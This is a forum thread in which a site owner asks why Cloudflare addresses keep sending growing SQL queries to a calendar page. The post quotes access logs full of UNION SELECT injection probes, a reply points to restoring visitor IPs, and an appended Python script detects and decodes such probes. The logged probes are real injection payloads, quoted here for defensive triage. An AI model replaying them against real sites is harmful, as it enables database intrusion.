Cloudflare hacking?

It seems like Cloudflare is repeatedly calling a webpage on our site (btcnj.com) with “nonsense” data. The data is SQL commands and they keep getting bigger. It looks like an injection attack.

What is going on?

This is what the access logs look like for this:

162.158.88.50 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20--%20 HTTP/1.0" 200 4733 "-" "-"
162.158.94.80 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20--%20 HTTP/1.0" 200 4740 "-" "-"
162.158.90.254 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20--%20 HTTP/1.0" 200 4743 "-" "-"
162.158.91.65 - - [21/Mar/2020:10:14:16 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20--%20 HTTP/1.0" 200 4747 "-" "-"
162.158.88.188 - - [21/Mar/2020:10:14:16 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20--%20 HTTP/1.0" 200 4750 "-" "-"
162.158.94.124 - - [21/Mar/2020:10:14:16 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20--%20 HTTP/1.0" 200 4753 "-" "-"
162.158.91.41 - - [21/Mar/2020:10:14:17 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20--%20 HTTP/1.0" 200 4756 "-" "-"
162.158.90.254 - - [21/Mar/2020:10:14:17 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20--%20 HTTP/1.0" 200 4759 "-" "-"
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20--%20 HTTP/1.0" 200 4763 "-" "-"
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20--%20 HTTP/1.0" 200 4768 "-" "-"
162.158.90.156 - - [21/Mar/2020:10:14:18 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45)%20--%20 HTTP/1.0" 200 4770 "-" "-"
162.158.94.124 - - [21/Mar/2020:10:14:19 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20--%20 HTTP/1.0" 200 4774 "-" "-"
162.158.88.50 - - [21/Mar/2020:10:14:19 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20--%20 HTTP/1.0" 200 4778 "-" "-"
162.158.89.133 - - [21/Mar/2020:10:14:20 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20--%20 HTTP/1.0" 200 4783 "-" "-"
162.158.94.80 - - [21/Mar/2020:10:14:21 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45)%20--%20 HTTP/1.0" 200 4787 "-" "-"

You are not rewriting IP addresses -> https://support.cloudflare.com/hc/en-us/sections/200805497-Restoring-Visitor-IPs

2 Likes

Thanks.

Some of the IP addresses in the log are already not Cloudflare’s.

I’m not sure if my hosting company is going to let me install that package.
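
A log-triage sketch for the pattern discussed in this thread, added as an example and not written by any participant: it parses access-log lines, decodes the `CHAR(...)` markers in each `UNION SELECT` probe, counts the columns, and checks whether the logged peer address falls in a Cloudflare range (in which case the real visitor address has to come from restored visitor IPs, as the reply says). The function names are hypothetical, the range list is a subset snapshot of Cloudflare's published IPv4 ranges, and the sample lines are the first three requests from the log above with straight quotes.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Assumption: subset snapshot of Cloudflare's published IPv4 ranges;
# refresh from https://www.cloudflare.com/ips/ before relying on it.
CLOUDFLARE_NETS = [ipaddress.ip_network(n) for n in (
    "162.158.0.0/15", "104.16.0.0/13", "172.64.0.0/13", "173.245.48.0/20",
    "141.101.64.0/18", "108.162.192.0/18", "198.41.128.0/17",
)]
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b(.*)", re.I | re.S)
CHAR_RE = re.compile(r"CHAR\(([\d,\s]+)\)", re.I)

def is_cloudflare(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_NETS)

def analyze(line):
    """Return details of a UNION SELECT probe, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, status, size = m.groups()
    query = unquote_plus(target.partition("?")[2])   # undo %20 / + encoding
    u = UNION_RE.search(query)
    if not u:
        return None
    # Each CHAR(a,b,...) is a string built from character codes: decode it.
    markers = ["".join(chr(int(c)) for c in group.split(","))
               for group in CHAR_RE.findall(u.group(1))]
    return {"peer": ip, "via_cloudflare": is_cloudflare(ip),
            "columns": len(markers), "markers": markers,
            "status": int(status), "bytes": 0 if size == "-" else int(size)}

def column_sweep(lines):
    """True when successive probes each add one column (column-count sweep)."""
    counts = [r["columns"] for r in map(analyze, lines) if r]
    return len(counts) >= 3 and all(b - a == 1 for a, b in zip(counts, counts[1:]))

# Sample input: first three requests from the log in the question.
SAMPLE = [
    '162.158.88.50 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20--%20 HTTP/1.0" 200 4733 "-" "-"',
    '162.158.94.80 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20--%20 HTTP/1.0" 200 4740 "-" "-"',
    '162.158.90.254 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20--%20 HTTP/1.0" 200 4743 "-" "-"',
]
if __name__ == "__main__":
    for rec in map(analyze, SAMPLE):
        print(rec)
    print("column sweep:", column_sweep(SAMPLE))
```

The `status` and `bytes` fields are kept so each probe's response can be compared against a normal response for the same page.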